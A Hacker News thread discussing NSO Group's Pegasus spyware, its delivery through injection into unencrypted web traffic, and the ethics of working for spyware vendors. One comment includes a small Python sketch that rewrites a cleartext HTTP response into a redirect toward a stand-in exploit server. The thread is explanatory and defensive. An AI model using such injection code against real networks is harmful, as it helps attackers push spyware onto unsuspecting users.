I think the developer community needs to start ostracising people working for these companies. Don't hire former employees, don't hang out with people who work for these companies at conferences.
Don't supply services to these companies (build their website, network...).
I believe that by letting people off the hook for participating in this (similar things can be said for e.g. the NSA) we are essentially endorsing the behaviour. If you work at e.g. NSO Group, you are personally responsible for governments suppressing and even killing (just look at SA) critics.
Ostracising someone from society solely based on where they work, without looking at their actual actions, implies guilt by association, a tactic often used by authoritarians. Everyone in a civilised society has the right to a fair trial without the presumption of guilt.
I was recently offered a job by NSO and didn't take it due to their terrible reputation. I wouldn't be surprised if some countries start denying entry to NSO employees. Even Facebook suspended the accounts of NSO employees after NSO hacked WhatsApp - https://www.vice.com/en_us/article/7x5nnz/nso-employees-take... .
On the other hand, their product is just a tool which can be used for good (stopping terrorists) or evil (spying on human rights activists). Just like a kitchen knife can be used for good (cooking a meal) or evil (stabbing people). So I find it hard to find the moral justification for the actions you suggest. The problem is not the tool or the tool's manufacturer, it's how it gets used.
This won't work; as long as there is a market for hacking phones, there will be those willing to sell their expertise.
We should focus on making things more secure. While security is a tough problem, it's also somewhat surprising that properly sandboxing a browser is so difficult.
I agree that people supporting this are guilty, but I don't agree with blacklists of developers for political reasons. Such blacklists are already established in the industry and speak of incompetence in leadership as it is. That doesn't mean their behaviour should be endorsed, but that is a case for legislation.
I really don't like NSO, to the point that I never go to their parties and meetups even when invited (and they have good parties).
However it's worth mentioning they really don't see it that way. A lot of people working for NSO (or the NSA) see themselves as making a personal sacrifice for public safety.
Also, NSO doesn't operate said technology, it just sells it - so it's a bit more like going after people making anti-DRM software or p2p sharing software. The only big difference is that NSO is making money.
I do agree that individuals should be held accountable for their work, but the degree of the work is what's problematic: is it a direct contribution or an indirect one?
If I am working on an open source project used by NSA to hack you, am I responsible? No. That type of moral policing would be bad.
If someone is writing software directly for hacking you, then yes, they are responsible, but then you must consider all the actions of the org where they used that tool. People might work on these tools because of terrorism or because they believe in the security of the state. That's by no means bad, but how the org goes about it can be bad and infringe rights. They don't have control over that. Now, if they don't quit over the misuse of their tool and are not constrained by anything (a person working for the NSA is likely to get another job without problem), then I think there's something to be said about personal responsibility.
Verifying the degree of contribution from outside is very hard to do, as most details of what happens inside these orgs remain secret. What their employees are told can be wildly different from what they end up doing.
That said, I don't believe targeting individuals will have much effect. It's actively bad because there's an easier road here: hold the org accountable. If we go down the path of wasting energy on excommunicating individuals, orgs may get a free pass. It's not hard to replace people in a big org, especially a monopoly. Go for the low-hanging fruit. Boycott the org.
I think the developer community needs to start refusing to use cellphones. They cannot be trusted: non-free software on top of a non-free OS on top of non-free firmware, with a separate processor whose behaviour we cannot observe from the main processor. A cellphone also relies on centralised wireless networks run by only a handful of providers, an easy and vulnerable single point of attack.
I do refuse to own a cellphone. What about you? Since you're suggesting the boycott, can you?
The Citizen Lab reports (one linked from this article) about the Israeli NSO Group's Pegasus spyware have been really scary for a few years now already.
Here's a category of articles on the citizenlab.ca web site described as "Investigations into the prevalence and impact of digital espionage operations against civil society groups": https://citizenlab.ca/category/research/targeted-threats/
I saw this discussed on reddit, and I was surprised that there was so much confusion about how this happened. It wasn't just "network injection": quite clearly (though unfortunately very poorly described in the article) there was a vulnerability in iOS/Safari that allowed remote code execution; network injection alone wouldn't have been enough. Does anyone know what the CVE was that allowed this?
A code execution vulnerability isn't enough. To work on truly any website, they need:
- A remote code execution vulnerability. There are almost certainly multiple vulnerabilities at play here, since long gone are the days where a single vuln gave arbitrary code execution.
- A way to bypass encryption/HTTPS, unless the remote code execution happened at a layer before encryption (which seems unlikely). EDIT: Apparently the hack only works on non-encrypted websites.
- Once remote code execution is achieved, a way to elevate privileges in order to make the hack more persistent and tap into other apps.
There are most likely several CVEs at play here. The amount of effort that went into this hack is, frankly, terrifying.
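To make the "bypass encryption" bullet concrete: on a cleartext page, an on-path attacker can simply rewrite the server's response. A toy sketch of that injection step alone, with a made-up hostname; the RCE and privilege-escalation stages are separate vulnerabilities this does not model, and real tooling is far more involved:

```python
# Illustrative sketch of only the network-injection step: an on-path
# attacker rewrites a cleartext HTTP response into a redirect toward an
# exploit server. HTTPS responses cannot be rewritten this way, which
# is why the attack needs a plain http:// page load.

EXPLOIT_SERVER = "http://exploit.example/payload"  # hypothetical

def inject_redirect(raw_response: bytes) -> bytes:
    """Replace a successful cleartext response with a 302 redirect to
    the attacker's server; pass anything else through untouched."""
    if not raw_response.startswith(b"HTTP/1.1 200"):
        return raw_response
    return (
        b"HTTP/1.1 302 Found\r\n"
        + f"Location: {EXPLOIT_SERVER}\r\n".encode()
        + b"Content-Length: 0\r\n\r\n"
    )

original = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"
print(inject_redirect(original).split(b"\r\n")[0])  # b'HTTP/1.1 302 Found'
```

Nothing here requires breaking crypto: the injected redirect simply wins the race to the victim's browser, which is why the later bullets (RCE, privilege escalation) carry all the real difficulty.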
Too bad I can't run a different browser engine on iOS. In a monoculture everyone is exposed to the same vulnerabilities. If we had 3 or 4 browser engines running on iOS then the odds of a specific vulnerability affecting a single user go down.
Further, there is competition for having the most secure browser. It's not controversial to say that 12 years ago IE, Firefox and Safari were pretty bad at security, and that Chrome in 2008 pushed them all to up their game.
Apple's stance on browser engines is at best claiming security by obscurity. Either apps are sandboxed or they aren't. If they are then it would be safe to run any browser engine. If they aren't then having only one means users have no choice when that one fails.
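The diversity argument can be put in numbers: a single-engine vulnerability hits only that engine's share of users, and hitting everyone at once requires every engine to be vulnerable simultaneously. A toy calculation, where the market shares and per-engine vulnerability probability are invented for illustration and engine independence is an assumption:

```python
def affected_share(shares, vulnerable_engine):
    """Fraction of all users hit by a bug in exactly one engine."""
    return shares[vulnerable_engine]

def prob_everyone_exposed(p_vuln_per_engine, shares):
    """Chance every user is exposed at once: all engines must be
    vulnerable simultaneously (engines assumed independent)."""
    return p_vuln_per_engine ** len(shares)

monoculture = {"engine_a": 1.0}
diverse = {"a": 0.4, "b": 0.3, "c": 0.2, "d": 0.1}  # invented shares

print(affected_share(monoculture, "engine_a"))  # 1.0
print(affected_share(diverse, "c"))             # 0.2
print(prob_everyone_exposed(0.5, monoculture))  # 0.5
print(prob_everyone_exposed(0.5, diverse))      # 0.0625
```

Diversity doesn't make any one engine safer, but it shrinks both the blast radius of a single vulnerability and the odds of a simultaneous total compromise.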
Also, does iOS have something similar to SELinux? I know it's not perfect, and there have been RCEs in Android as well. But I'm surprised there are still things out there like the original TIFF jailbreak exploit, which allowed full root access to a person's device from just visiting a webpage.
>Does anyone know what the CVE was that allowed this?
>The malicious code even wipes crash logs, making it impossible to determine exactly what weaknesses were exploited to take over the phone, said Claudio Guarnieri, head of Amnesty International’s Security Lab, in an interview.
Thanks for clarifying. I honestly wondered how the browser was able to install spyware that "allows remote access to everything on the phone" (per the article), as the browser is supposed to be a sandboxed environment. I'm relieved it was "just" a vulnerability in iOS.
On HN I've seen a lot of unencrypted sites lately. I don't personally feel comfortable browsing them, so I avoid them. Near the end of the article here, it mentions that this attack is only possible on an unencrypted website. Is there a reason why so many people are not encrypting their websites? Even browsers have picked up on the insecure nature of HTTP. Please correct me if I'm wrong here; I just find it very strange how many links I've inspected only to see a lack of TLS/SSL.
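Spotting such links is mechanical: any URL whose scheme is plain http is injectable by an on-path attacker. A minimal stdlib-only check; apart from the Citizen Lab link already in this thread, the example URLs are made up:

```python
from urllib.parse import urlparse

def insecure_links(urls):
    """Return the subset of URLs served without TLS (plain http)."""
    return [u for u in urls if urlparse(u).scheme == "http"]

links = [
    "https://citizenlab.ca/category/research/targeted-threats/",
    "http://example.com/news",  # cleartext: injectable by an on-path attacker
    "https://news.ycombinator.com/",
]
print(insecure_links(links))  # ['http://example.com/news']
```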
Ok, so I want to make something clear to the (smart but mostly not "in-the-know" about NSO) HN crowd.
Let's say you're a Mexican drug lord or Saudi prince. You know this tech exists and the US/Israeli/European governments use it.
Then, you see this article, and see all the comments in the comment section about how competent, scary and balance-changing the technology is.
Basically: I think these pieces are bought and paid for by NSO through a PR firm, but you are not the target. When we leave comments like "NSO's tech is so good it has to be regulated!" or "NSO's tech is dangerous!" we are playing directly into the PR firm's clever hands.
It's like an article about how good the AR-15 or the F-35 are. Obviously to me (and most of the readers) it's mostly "why are we focusing on technology of death" but we are not the target.
Why aren't cell phone tower communications secured? Why aren't cell towers secured with certificates verified by the network? Why aren't stingray devices considered an attack on the cell network?
If stingray devices work by tricking your phone to connect with older protocols like 3G, why aren't those protocols deprecated just like we deprecate older encryption methods that are no longer secure?
I'm probably naive here because I'm not versed in networks, but couldn't he have avoided surveillance by using a VPN? Wasn't one of the design features of VPNs that your connection can't be hijacked?
The article mentions NSO's Pegasus, which the journalist victim downloaded and which presumably installed surveillance tools on his iPhone. What is Pegasus? Is it a platform of browser zero-days that then installs surveillance tools? Does it rootkit the phone?
> the Israeli company issued a policy that vowed the company would cut off clients if they were found to misuse the surveillance technology to target journalists and human rights activists
This goes right up there with "the backdoor for which only we'll have the key".
Would using something like Opera Mini have prevented this attack from happening?
I'm imagining a proxy-like tool that lets high-exposure individuals request webpages and have them downloaded/parsed, and possibly rendered, before handing them off to the client device.
Perhaps it would let the client download HTTPS normally but switch modes for any HTTP requests (if I understand what happened here correctly.)
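At its core, the mode switch described could reduce to a per-request dispatcher: tunnel TLS traffic untouched and only intercept cleartext. A rough sketch of that decision logic alone, with no real fetching or rendering and illustrative URLs:

```python
from urllib.parse import urlparse

def route_request(url):
    """Decide how the hypothetical proxy handles each request:
    - https: pass the encrypted stream through untouched ('tunnel')
    - http:  fetch and render server-side, return a safe snapshot ('sanitize')
    - anything else is refused outright ('block')
    """
    scheme = urlparse(url).scheme
    if scheme == "https":
        return "tunnel"
    if scheme == "http":
        return "sanitize"
    return "block"

print(route_request("https://bank.example/login"))  # tunnel
print(route_request("http://blog.example/post"))    # sanitize
print(route_request("ftp://files.example/a.tar"))   # block
```

Server-side rendering of the cleartext requests would move the exploitable parsing off the client device, at the cost of the proxy seeing that traffic.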
I feel like this article makes the technique sound a lot more novel/surprising than it is. It seems like a simple case of "phone had an RCE vulnerability that got exploited by an attacker in control of the network".
Time for everyone to install HTTPS Everywhere and turn on Encrypt All Sites Eligible (EASE) on desktop.
On mobile, I highly recommend using a browser that supports extensions, or pressuring companies to enable third-party browsers. It's not overstating it to say that our legislators should compel that competition; it's a national security issue that journalists, intelligence officials, and the President, using devices from a certain manufacturer, cannot change the browser or use helpful extensions like HTTPS Everywhere.
malux85 | 5 years ago
Couple that with compliance being driven by ethics and non-compliance being driven by money, and it will never work.
We should focus on increasing security.
driverdan | 5 years ago
If you work for a company like NSO you are willingly complicit in violations of human rights. That's not the kind of person I want to work with.
nsajko | 5 years ago
This is a frightening 8-part series about the abuse of "Pegasus" in Mexico 2017-2019: https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware...
logicNSci | 5 years ago
I want to post this every time someone claims Apple is best for security. We need logic to fight marketing.
shbooms | 5 years ago
The author directly contradicts the headline used here:
> The website must use “clear text” which means the URL starts with “http” not “https.”
maerF0x0 | 5 years ago
https://rietta.com/blog/comcast-insecure-injection/
https://news.ycombinator.com/item?id=21389657
ezoe | 5 years ago
If you were properly trained, you should have already realized that a cellphone is not a trustworthy means of communication.
AaronFriel | 5 years ago
https://www.eff.org/deeplinks/2018/12/how-https-everywhere-k...